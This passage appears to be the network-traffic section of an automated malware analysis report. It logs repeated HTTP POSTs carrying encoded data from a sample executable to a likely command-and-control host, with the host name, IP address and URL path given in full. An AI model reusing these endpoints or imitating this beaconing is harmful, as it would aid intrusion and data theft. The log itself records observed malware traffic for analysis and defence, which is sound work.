                                                                    Aug 21, 2024 10:03:49.245367050 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:49.441786051 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    43 | 192.168.2.7 | 52999 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:49.569741011 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:49.927572966 CEST | 2544 | OUT | request body data
                                                                    Aug 21, 2024 10:03:50.271882057 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:50.472187996 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    44 | 192.168.2.7 | 53000 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:50.612498999 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:50.959260941 CEST | 2544 | OUT | request body data


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    45 | 192.168.2.7 | 53001 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:51.249356985 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:51.607840061 CEST | 1868 | OUT | request body data
                                                                    Aug 21, 2024 10:03:51.911799908 CEST | 1236 | OUT | request body data
                                                                    Aug 21, 2024 10:03:51.978138924 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:51.979155064 CEST | 632 | OUT | request body data
                                                                    Aug 21, 2024 10:03:52.265796900 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    46 | 192.168.2.7 | 53002 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:03:51.372467041 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:51.741489887 CEST2544OUTData Raw: 5f 57 5c 51 54 47 51 5e 5b 5f 5a 51 59 52 58 5f 57 50 5d 5a 57 5b 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _W\QTGQ^[_ZQYRX_WP]ZW[STYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/0#D#> \ !>.+<-=?7]#0 20<<# */&F$.Y/1
Aug 21, 2024 10:03:52.050192118 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:52.272365093 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.7 | 53003 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:52.433614016 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
Aug 21, 2024 10:03:52.786986113 CEST | 2544 | OUT | Data Raw: 5a 50 5c 56 51 47 54 58 5b 5f 5a 51 59 55 58 52 57 5f 5d 52 57 5e 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\VQGTX[_ZQYUXRW_]RW^S_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._.0?A#.<#3:)?>5]+='Z4?0!1$P*)04!/>&F$.Y/-
Aug 21, 2024 10:03:53.126692057 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:53.261482954 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.7 | 53004 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:53.382328033 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
Aug 21, 2024 10:03:53.739996910 CEST | 2544 | OUT | Data Raw: 5a 51 5c 55 54 41 54 5d 5b 5f 5a 51 59 53 58 57 57 5b 5d 5e 57 5e 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZQ\UTAT][_ZQYSXWW[]^W^S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-.3"'40+-(<.\(+Z4Z3R!2 P?843>.>&F$.Y/5
Aug 21, 2024 10:03:54.083780050 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:54.774826050 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.7 | 53005 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:54.898858070 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:03:55.255861998 CEST | 2544 | OUT | Data Raw: 5a 56 59 55 54 43 54 5b 5b 5f 5a 51 59 5e 58 56 57 5b 5d 52 57 59 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZVYUTCT[[_ZQY^XVW[]RWYS^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./+C"-' 6==+>Z)=7[#7W3+90#0";>&F$.Y/
Aug 21, 2024 10:03:55.602005005 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:55.739381075 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.7 | 53006 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:55.867033958 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:03:56.224579096 CEST | 2544 | OUT | Data Raw: 5a 52 5c 51 51 47 54 5b 5b 5f 5a 51 59 5e 58 52 57 5e 5d 52 57 5d 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZR\QQGT[[_ZQY^XRW^]RW]SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-80<#-<^ 9Z=4X+==\?=+#!1$S<9"0)_,&F$.Y/
Aug 21, 2024 10:03:56.549928904 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:56.687179089 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.7 | 53007 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:56.913096905 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:03:57.271532059 CEST | 2544 | OUT | Data Raw: 5f 54 59 52 51 44 51 5d 5b 5f 5a 51 59 5f 58 50 57 58 5d 58 57 59 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _TYRQDQ][_ZQY_XPWX]XWYSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./#!. #0"+=4]+>6<(7'72#?$#V>,>&F$.Y/


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.7 | 53008 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:57.280612946 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:03:57.630922079 CEST | 1868 | OUT | Data Raw: 5f 52 59 53 54 40 51 5e 5b 5f 5a 51 59 5f 58 56 57 5f 5d 5e 57 51 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _RYST@Q^[_ZQY_XVW_]^WQS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.Y;/D6-#405])=\<![?=#<7!"'+*$7#&8&F$.Y/
Aug 21, 2024 10:03:57.963222980 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:58.095185041 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 53 3d 1b 22 12 32 28 2c 19 27 33 2e 1e 2b 3d 09 5f 2b 2d 31 5f 24 38 25 1a 26 00 0d 08 27 5d 21 5c 28 3e 00 51 25 2f 0e 01 2d 24 2b 5d 0c 13 21 04 21 39 3a 5b 26 5a 30 59 3d 3b 2f 15 20 3c 0b 03 28 14 2d 16 3c 3f 3c 58 3f 2a 3f 58 28 2a 2a 57 3b 3b 2a 05 2f 30 0b 0e 37 2e 2b 52 0d 11 24 57 3f 03 29 1d 3d 2e 23 5e 35 06 2b 1d 26 3e 3a 55 31 0c 3a 57 30 07 24 1f 26 1c 3e 09 27 32 35 1d 32 3b 0c 5e 26 2f 0f 57 35 22 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &S="2(,'3.+=_+-1_$8%&']!\(>Q%/-$+]!!9:[&Z0Y=;/ <(-<?<X?*?X(**W;;*/07.+R$W?)=.#^5+&>:U1:W0$&>'252;^&/W5"#T,"W3UV


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.7 | 53009 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:57.398621082 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:03:57.755934000 CEST | 2544 | OUT | Data Raw: 5a 52 5c 57 51 45 54 5b 5b 5f 5a 51 59 55 58 54 57 5c 5d 5e 57 50 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZR\WQET[[_ZQYUXTW\]^WPSXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X/U#B#=;7%Z><?8#<41 P+$4V68&F$.Y/-
Aug 21, 2024 10:03:58.101869106 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:58.309056997 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.7 | 53010 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:58.428778887 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
Aug 21, 2024 10:03:58.787074089 CEST | 2544 | OUT | Data Raw: 5a 57 5c 53 51 43 54 5e 5b 5f 5a 51 59 51 58 5f 57 5d 5d 5f 57 5f 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZW\SQCT^[_ZQYQX_W]]_W_S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./#?5(\ =<^?+.#[#<R 2#<8 0%..&F$.Y/=
Aug 21, 2024 10:03:59.146661043 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:03:59.320493937 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.7 | 53011 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:03:59.592876911 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:03:59.943209887 CEST | 2544 | OUT | Data Raw: 5f 51 59 55 54 48 51 5c 5b 5f 5a 51 59 5e 58 5e 57 50 5d 5b 57 5f 53 5e 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _QYUTHQ\[_ZQY^X^WP][W_S^YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-83?5="#:*- _<=[??7<#!;()<" )Y8&F$.Y/
Aug 21, 2024 10:04:00.273324966 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:00.472439051 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.7 | 53012 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:00.617880106 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:04:00.974745035 CEST | 2544 | OUT | Data Raw: 5f 57 5c 56 51 45 51 5d 5b 5f 5a 51 59 53 58 53 57 5e 5d 52 57 5b 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _W\VQEQ][_ZQYSXSW^]RW[SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X,U8".4X #!]+=(^+=9\<-'7,7#"0P(9<7^;.&F$.Y/5
Aug 21, 2024 10:04:01.289443970 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 21, 2024 10:04:01.486655951 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.7 | 53013 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
Timestamp | Bytes transferred | Direction | Data
Aug 21, 2024 10:04:01.618535042 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
Aug 21, 2024 10:04:01.974509954 CEST | 2544 | OUT | Data Raw: 5f 55 5c 5e 51 42 54 58 5b 5f 5a 51 59 55 58 51 57 50 5d 5b 57 50 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _U\^QBTX[_ZQYUXQWP][WPSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./U05+#V9>=>=&< "?# "/(_8# /&F$.Y/-
Aug 21, 2024 10:04:02.300474882 CEST | 25 | IN | HTTP/1.1 100 Continue
